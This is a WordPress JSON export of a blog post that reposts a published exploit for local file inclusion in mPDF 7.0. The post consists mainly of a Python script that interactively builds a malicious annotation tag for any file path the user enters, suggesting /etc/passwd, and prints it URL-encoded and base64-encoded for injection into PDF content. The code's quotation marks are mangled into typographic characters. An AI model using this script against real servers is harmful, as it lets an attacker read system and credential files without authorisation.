{"id":28840,"date":"2022-08-01T20:38:49","date_gmt":"2022-08-01T16:38:49","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167897\/mpdf70-lfi.txt"},"modified":"2022-08-02T08:36:23","modified_gmt":"2022-08-02T04:06:23","slug":"mpdf-7-0-local-file-inclusion","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/mpdf-7-0-local-file-inclusion\/","title":{"rendered":"mPDF 7.0 Local File Inclusion"},"content":{"rendered":"

# Exploit Title: mPDF 7.0 – Local File Inclusion
\n# Google Dork: N\/A
\n# Date: 2022-07-23
\n# Exploit Author: Musyoka Ian
\n# Vendor Homepage: https:\/\/mpdf.github.io\/
\n# Software Link: https:\/\/mpdf.github.io\/
\n# Version: CuteNews
\n# Tested on: Ubuntu 20.04, mPDF 7.0.x
\n# CVE: N\/A<\/p>\n

#!\/usr\/bin\/env python3<\/p>\n

from urllib.parse import quote
\nfrom cmd import Cmd
\nfrom base64 import b64encode<\/p>\n

class Terminal(Cmd):
\nprompt = “\\nFile >> ”
\ndef default(self, args):
\npayload_gen(args)
\ndef banner():
\nbanner = “”” _____ _____ ______ ______ ___ __ __ _ _ _
\n| __ \\| __ \\| ____| |____ \/ _ \\ \\ \\ \/ \/ | | (_) |
\n_ __ ___ | |__) | | | | |__ \/ \/ | | | \\ V \/ _____ ___ __ | | ___ _| |_
\n| ‘_ ` _ \\| ___\/| | | | __| \/ \/| | | | > < \/ _ \\ \\\/ \/ ‘_ \\| |\/ _ \\| | __|
\n| | | | | | | | |__| | | \/ \/ | |_| | \/ . \\ | __\/> <| |_) | | (_) | | |_
\n|_| |_| |_|_| |_____\/|_| \/_\/ (_)___(_)_\/ \\_\\ \\___\/_\/\\_\\ .__\/|_|\\___\/|_|\\__|
\n| |
\n|_| “””
\nprint(banner)
\ndef payload_gen(fname):
\npayload = f'<annotation file=”{fname}” content=”{fname}” icon=”Graph” title=”Attached File: {fname}” pos-x=”195″ \/>’
\nencoded_payload = quote(payload)
\nprint(“[+] Replace the content with the payload below”)<\/p>\n

print(f”Url encoded payload:\\n{encoded_payload}\\n”)
\nbase64enc = b64encode(encoded_payload.encode())
\nprint(f”Base64 encoded payload:\\n{base64enc.decode()}\\n”)
\nif __name__ == (“__main__”):
\nbanner()
\nprint(“Enter Filename eg. \/etc\/passwd”)
\nterminal= Terminal()
\nterminal.cmdloop()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: mPDF 7.0 – Local File Inclusion # Google Dork: N\/A # Date: 2022-07-23 # Exploit Author: Musyoka Ian # Vendor Homepage: https:\/\/mpdf.github.io\/ # Software Link: https:\/\/mpdf.github.io\/ # Version: CuteNews # Tested on: Ubuntu 20.04, mPDF 7.0.x # CVE: N\/A #!\/usr\/bin\/env python3 from urllib.parse import quote from cmd import Cmd from base64 import …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28840","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28840","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28840"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28840\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28840"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28840"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28840"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}